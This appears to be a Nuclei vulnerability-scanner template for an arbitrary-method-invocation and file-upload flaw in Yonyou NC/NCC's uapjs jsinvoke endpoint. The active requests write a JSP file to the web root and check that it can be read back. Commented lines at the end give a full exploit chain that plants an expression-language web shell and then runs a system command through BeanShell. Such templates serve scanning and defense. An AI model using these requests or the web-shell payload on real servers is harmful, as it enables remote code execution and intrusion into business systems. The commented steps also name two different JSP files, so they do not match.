42 lines
1.4 KiB
YAML
42 lines
1.4 KiB
YAML
|
id: yonyou-nc-uapjs-jsinvoke-fileupload
|
|||
|
|
|
|||
|
|
info:
|
|||
|
|
name: Yonyou NC uapjs jsinvoke 文件上传漏洞
|
|||
|
|
author: SleepingBag945
|
|||
|
|
severity: critical
|
|||
|
|
description: 用友NC 及 NCC系统存在任意方法调用漏洞,通过uapjs (jsinvoke)利用漏洞可调用危险方法造成攻击。
|
|||
|
|
tags: yonyou
|
|||
|
|
|
|||
|
|
http:
|
|||
|
|
- raw:
|
|||
|
|
- |
|
|||
|
|
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
|
|||
|
|
Host: {{Hostname}}
|
|||
|
|
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
|
|||
|
|
|
|||
|
|
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig",
|
|||
|
|
"parameterTypes":["java.lang.Object","java.lang.String"],
|
|||
|
|
"parameters":["{{randstr_2}}","webapps/nc_web/{{randstr_1}}.jsp"]}
|
|||
|
|
|
|||
|
|
- |
|
|||
|
|
GET /{{randstr_1}}.jsp HTTP/1.1
|
|||
|
|
Host: {{Hostname}}
|
|||
|
|
|
|||
|
|
matchers:
|
|||
|
|
- type: dsl
|
|||
|
|
dsl:
|
|||
|
|
- status_code_1 == 200
|
|||
|
|
- status_code_2 == 200 && contains(body_2,"{{randstr_2}}")
|
|||
|
|
condition: and
|
|||
|
|
|
|||
|
|
|
|||
|
|
# POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
|
|||
|
|
# Host: {{Hostname}}
|
|||
|
|
|
|||
|
|
# {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/404.jsp"]}
|
|||
|
|
|
|||
|
|
|
|||
|
|
# POST /cmdb.jsp?error=bsh.Interpreter HTTP/1.1
|
|||
|
|
# Host: {{Hostname}}
|
|||
|
|
|
|||
|
|
# cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())
|